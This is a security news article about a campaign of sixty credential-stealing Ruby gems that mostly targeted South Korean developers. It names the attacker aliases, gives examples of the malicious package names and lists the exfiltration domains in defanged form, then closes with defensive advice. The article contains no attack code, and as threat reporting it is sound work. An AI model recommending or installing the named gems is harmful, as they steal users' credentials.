Sixty malicious Ruby gems containing credential-stealing code have been downloaded more than 275,000 times since March 2023, putting thousands of developer accounts at risk. According to security researchers at Socket, the campaign primarily targeted South Korean developers using automation tools for Instagram, TikTok, Twitter/X, Telegram, Naver, WordPress, and Kakao.
RubyGems, the official package manager for the Ruby programming language, allows developers to share and install libraries—called “gems.” Unfortunately, this same ecosystem has been exploited by cybercriminals to spread malicious packages under multiple aliases, making them harder to detect and remove.
How the Attack Worked
The attackers, using aliases like zon, nowon, kwonsoonje, and soonje, uploaded malicious gems to RubyGems.org over a span of several years. Many of these gems mimicked legitimate automation or SEO tools, a tactic known as typosquatting. Examples include:
- WordPress-style tools: wp_posting_duo, wp_posting_zon
- Telegram-style bots: tg_send_duo, tg_send_zon
- SEO/backlink tools: backlink_zon, back_duo
- Blog automation: nblog_duo, tblog_zon
- Naver Café tools: cafe_basics_duo, cafe_buy, cafe_blog_comment
These packages appeared to function normally, complete with a legitimate-looking graphical interface, but secretly acted as phishing tools. Once users entered their credentials, the data—including usernames, passwords, and device MAC addresses—was sent to attacker-controlled servers like programzon[.]com, appspace[.]kr, and marketingduo[.]co[.]kr.
Real-World Impact
Socket reports that some stolen credentials have already surfaced on Russian-speaking darknet markets, confirming that the campaign successfully harvested and sold sensitive data. In some cases, victims received fake login confirmations while no real authentication occurred—masking the breach.
Alarmingly, at least 16 malicious gems remain live on RubyGems.org as of the latest update, despite reports to the RubyGems security team.
A Growing Supply Chain Threat
This is not the first RubyGems supply chain compromise. In June, Socket identified malicious gems impersonating Fastlane, an open-source automation tool for mobile app development, specifically targeting Telegram bot developers.
Developers are urged to take proactive measures:
- Inspect source code for obfuscated or suspicious segments
- Check the publisher’s history and reputation
- Lock dependencies to verified safe versions
Conclusion
The discovery of these 60 malicious Ruby gems underscores the growing supply chain risks in open-source ecosystems. As attacks become more sophisticated, developers must remain vigilant, vetting packages thoroughly before integration to prevent costly security breaches.
